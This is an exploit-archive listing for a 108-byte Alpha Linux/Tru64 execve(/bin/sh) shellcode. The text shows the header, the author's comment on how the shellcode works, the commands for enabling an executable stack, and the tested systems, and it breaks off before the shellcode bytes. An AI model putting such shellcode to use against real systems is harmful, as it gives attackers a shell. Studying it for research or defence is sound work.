Exploits / Vulnerability Discovered : 2019-03-25 |
Type : shellcode |
Platform : linux
This exploit / vulnerability Linux/tru64 alpha execve(/bin/sh) shellcode (108 bytes) is for educational purposes only and if it is used you will do on your own risk!
[+] Code ...
/* Alpha (AXP) Linux/Tru64 execve() shellcode
* ==========================================
* This shellcode uses the stack to store a generated
* "callsys" instruction, due to this it needs executable
* stack. To test on Linux use "execstack -s <bin>" and
* on Tru64 use "sysconfig -r proc executable_stack=1".
*
* Tested against Tru64 5.1B & Linux 2.6.26-2-alpha-generic
*
* -- Hacker Fantastic (https://hacker.house)
*/
#include <stdio.h>
#include <stdlib.h>